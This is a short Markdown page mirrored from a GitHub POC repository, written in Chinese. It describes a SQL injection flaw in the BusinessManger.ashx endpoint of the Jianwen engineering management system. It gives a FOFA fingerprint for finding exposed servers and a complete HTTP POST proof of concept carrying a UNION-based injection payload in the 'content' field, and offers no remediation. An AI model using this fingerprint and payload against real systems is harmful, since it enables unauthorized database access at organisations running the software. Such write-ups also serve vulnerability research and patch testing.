mirror of
https://github.com/eeeeeeeeee-code/POC.git
synced 2025-07-29 05:54:14 +00:00
22 lines
711 B
Markdown
22 lines
711 B
Markdown
![]() |
# 建文工程管理系统BusinessManger.ashx存在SQL注入漏洞
|
||
|
|
||
|
建文工程管理系统 `/AppInterface/Business/BusinessManger.ashx `存在SQL注入漏洞。
|
||
|
|
||
|
## fofa
|
||
|
|
||
|
```yaml
|
||
|
body="Login/QRLogin.ashx"
|
||
|
```
|
||
|
|
||
|

|
||
|
|
||
|
## poc
|
||
|
|
||
|
```yaml
|
||
|
POST /AppInterface/Business/BusinessManger.ashx HTTP/1.1
|
||
|
Host:
|
||
|
Content-Type: application/x-www-form-urlencoded
|
||
|
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
|
||
|
|
||
|
method=PrjType&content=%' and 1=2 union select 1,(select+SUBSTRING(sys.fn_sqlvarbasetostr(HASHBYTES('MD5','233')),3,32));-- a
|
||
|
```
|